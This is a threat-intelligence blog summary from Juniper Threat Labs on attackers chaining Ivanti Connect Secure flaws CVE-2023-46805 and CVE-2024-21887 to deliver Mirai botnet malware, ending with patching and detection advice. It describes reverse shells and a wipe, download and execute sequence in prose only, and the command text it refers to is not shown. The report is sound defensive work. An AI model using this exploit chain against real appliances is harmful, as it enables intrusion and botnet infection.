Juniper Threat Labs has been monitoring exploitation attempts targeting an Ivanti Pulse Secure authentication bypass with remote code execution vulnerabilities.
We have observed instances of Mirai botnet delivery in the wild, using this exploit with remote code execution capabilities.
This exploit facilitates malware delivery, posing a significant threat to compromise entire networks.
In the subsequent analysis, we will explore the vulnerability, its exploitation methods, the observed payload, and discuss Juniper's response to this threat.
CVE-2023-46805 - A security flaw, affecting both Ivanti ICS and Ivanti Policy Secure, enables a remote attacker to gain unauthorized access to restricted resources by circumventing control checks.
Combining both the auth bypass and path traversal vulnerabilities, attackers can access sensitive resources.
CVE-2024-21887 - A command injection flaw in the web components of Ivanti Connect Secure and Ivanti Policy Secure enables an attacker to send carefully crafted requests, executing arbitrary commands on the appliance.
Notably, this vulnerability is exploitable over the internet.
Others have observed instances in the wild where attackers have exploited this vulnerability using both curl and Python-based reverse shells, enabling them to take control of vulnerable systems.
More recently, we have encountered Mirai payloads delivered through shell scripts.
This command sequence attempts to wipe files, downloads a script from a remote server, sets executable permissions, and executes the script, potentially leading to an infected system.
This set of commands tries to navigate to different system directories.
Juniper Threat Labs obtained and analyzed the payloads and identified them as Mirai botnets.
The increasing attempts to exploit Ivanti Pulse Secure's authentication bypass and remote code execution vulnerabilities are a significant threat to network security.
The discovery of Mirai botnet delivery through these exploits highlights the ever-evolving landscape of cyber threats.
The fact that Mirai was delivered through this vulnerability will also mean the deployment of other harmful malware and ransomware is to be expected.
Understanding how these vulnerabilities can be exploited and recognizing the specific threats they pose is crucial for protecting against potential risks.
Mitigating these risks involves applying the patches provided by Ivanti to address the identified vulnerabilities.
Juniper ATP Cloud offers protection against Mirai and other malware, while the use of IDP signatures helps prevent exploit attacks at the network level.
Juniper ATP Cloud detects Mirai using machine learning based on static and behavioral analysis.
This Cyber News was published on blogs.juniper.net. Publication date: Thu, 09 May 2024 14:43:06 +0000